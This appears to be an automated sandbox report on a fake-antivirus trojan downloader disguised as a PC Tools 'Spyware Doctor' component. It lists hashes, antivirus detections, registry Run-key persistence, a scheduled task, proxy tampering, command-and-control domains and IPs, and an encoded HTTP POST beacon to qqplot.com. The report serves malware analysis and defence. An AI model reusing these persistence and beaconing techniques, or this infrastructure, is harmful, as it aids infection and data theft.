Analysis Date2014-12-03 03:21:15
MD514a647a2d43f7236b8667413bef7cc41
SHA1b312985a912ffd3b39b310255cad615925641fec

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5123aa106b5f34c008ec697879ef4f81 sha1: 5fadb264866c2b024b295807ee9edbb87cdac063 size: 12288
Section.rdata md5: c99a74c555371a433d121f551d6c6398 sha1: 605db3fdbaff4ba13729371ad0c4fbab3889378e size: 2048
Section.data md5: b4b5149d15c08aee0c4fcf8dc621d9d2 sha1: b0d09d1c8fb2388cc3541e708740be8b80d2ace3 size: 112128
Section.rsrc md5: 19117b1d314e5905fd7fb899a79f8064 sha1: ae4df4c9e995e73acc8cf9669075ef92c13ce57f size: 5120
Timestamp2009-04-19 03:16:21
VersionLegalCopyright: Copyright © 2010 f PC Tools. All rights reserved. Ij
InternalName: damaz72
FileVersion: 7.0.0.61
CompanyName: PC Tools
LegalTrademarks:
Comments:
ProductName: 6Z lN
ProductVersion: 7.0.0.61
FileDescription: CSpyware Doctor ComponentyF
OriginalFilename: damaz72
PEhash72db67a9e99a8e2d2a5b1b01e35b1a7dc8e4b026
IMPhash7adbf4fdfef9e936423f9e69b6f564a1
AV360 SafeGen:Heur.IPZ.7
AVAd-AwareGen:Heur.IPZ.7
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Heur.W32
AVAuthentiumW32/FakeAlert.KN.gen!Eldorado
AVAvira (antivir)TR/Kazy.RD
AVBullGuardGen:Heur.IPZ.7
AVCA (E-Trust Ino)Win32/Renos.D!generic
AVCAT (quickheal)Trojan.Renos.LN
AVClamAVno_virus
AVDr. WebTrojan.DownLoader2.37329
AVEmsisoftGen:Heur.IPZ.7
AVEset (nod32)Win32/Kryptik.AEUK
AVFortinetW32/Krypt.QKV!tr
AVFrisk (f-prot)W32/FakeAlert.KN.gen!Eldorado
AVF-SecureGen:Heur.IPZ.7
AVGrisoft (avg)Win32/Cryptor
AVIkarusTrojan-Downloader.SuspectCRC
AVK7Trojan ( 002456451 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Downloader
AVMcafeeDownloader-CEW.ap
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.LX
AVMicroWorld (escan)Gen:Heur.IPZ.7
AVNormanGen:Heur.IPZ.7
AVRisingTrojan.Win32.Generic.1285FA39
AVSophosMal/FakeAV-IZ
AVSymantecTrojan.FakeAV!gen52
AVTrend MicroTROJ_RENOS.SMRK
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSlacvictoria.com
Winsock DNSqqplot.com

Network Details:

DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.140.1
DNSwsj.com
Type: A
205.203.140.65
DNSwsj.com
Type: A
205.203.132.1
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSqqplot.com
Type: A
109.74.195.149
DNSlacvictoria.com
Type: A
DNSpaulo-fg.com
Type: A
DNSbonreligion.com
Type: A
HTTP POSThttp://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 109.74.195.149:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   3139682b 314f4870 37655263 48506959   19h+1OHp7eRcHPiY
0x00000150 (00336)   6f393930 4d55756a 67555734 62765449   o990MUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   49367034 366e3336 642f3334 6b705656   I6p46n36d/34kpVV
0x00000240 (00576)   32623651 672f413d 3d                  2b6Qg/A==


Strings
._.D
.
..
.
.
p
D.
.

040904E4
 2010 f PC Tools.  All rights reserved. Ij
6Z lN
7.0.0.61
7XPS
aHJkZH
BBABORT
Cannot open file "%s". %s
CklzJ
Comments
CompanyName
Copyright 
CSpyware Doctor ComponentyF
damaz72
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
PC Tools
ProductName
ProductVersion
Property is read-only
Property %s does not exist
QkSY
QPBm
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
VarFileInfo
VS_VERSION_INFO
0d9>\Dh
(0K+8$l
0QBE8d
1My:Ey
1X2ioK
2UPz5bIR
2Yfs0Q
30e(#j`e
32NaxQO
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3)6{Ik
3e`^iko13\
?3hc(aV
44;xd,
^4]B}c
4g9V<D
^4 .Gl
4pfrivv
4SwuBs
5K;y+A
5(>tqY6
6?Ok9Aq
6XwdAk
6ZEk[\
7Gkpa`Q0V)
7IY1SzUv
7@\S8WB
7&SXhF*
8c-^jH
8JNgDq
8LN#t-<O
8 _\w"4
)[\#9A
9eY%.z-
_9^(u!
_a6LRLJui7PLCT6@16
AbeXf)_
/aCKO)
@ADBqY
#AkkX_
'ao&rXs
_ATD0i@12
_BagV9rrn9
B=)~)c
BM*e:+
bP}P1}
C9^6/u
CreatePopupMenu
CRmkqnpTu
czlybbpjD@4
damaz72
@.data
di"W)|
D'KrGKs
dY|	W0f
Eb3IB9
Edm.vRm
em-ErC
Eo1rmle
e@U\N2eC!
ExitProcess
F039}%r
f9cWMt
F[#r\}\#
/fvY:Z:
&G#3]B
,G9+7654k
GC4b{M
)Gc9j>
GetActiveWindow
GetCapture
GetCurrentThreadId
GetCursor
GetMenu
GetSystemDefaultLangID
GetThreadLocale
GetTickC
GetWindow
GetWindowDC
@GQd4o
gsdV"g
g?;,YWz
	=h">|
;HimgIa
Hshlwapi
/huS3.
I9qqmsc
IDQAOC
IFZyu7
}imX-E
it]C_t
j7fbPKD
"<^Jc8
jX FkX:
JYL!QK
K095]b	
k36r6j
KERNEL32.dll
k<Mwg'4
!L<[,',N
LnXVg{PGx
LoadIconA
LoadLibraryA
/lp@_-x
lstrlenA
m95L[v{
Mo7ul5H
~mSa~C
MSICP60
n1,kF7
~N?F%w
o0k6V{
O4+T.z
oc sBId
od5OUf4
@=OdRd>S>
OHY`2	
Os <R*H:
ow$L	X
Oy"\c1
)p+3h38B
@.P#56
pFi t&VC
ph{7^&
P'RYXz]
-->$.q
(q(2/0@g
q\|%bv
QL^A6:
qOy{%}
r0]||(
`.rdata
:rL]{i
Rr(9K_
s'Bn} 
SetScrollPos
SetScrollRange
'SnIbc
Su\AMO^
SUbHy`>
T44Nr72
t4rWPLn
>t'Fij
This program must be run under Win32
tI9cgWJ0sl
tIwQy_
tM	Lj%Wo
tU[0A|
[T#u9s
tVyCj5
U0MVdlK
UG3Ibf
U%Rj%E
Us3rD1f
user32.dll
'u~sgO
u>v#Kp
uY|31D
VDKpxw
VirtualAlloc
v T5KsX
Vv765eE
We9p]$
$we/pc
W$o][G
X,CJzJ
\	{Xe-
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
x]O!cf
xWT]e7
Y{:CS+
\Y!i\V
Y/Nj$-o
)y_	_v
y^Xu_u@^
ZrB@Y2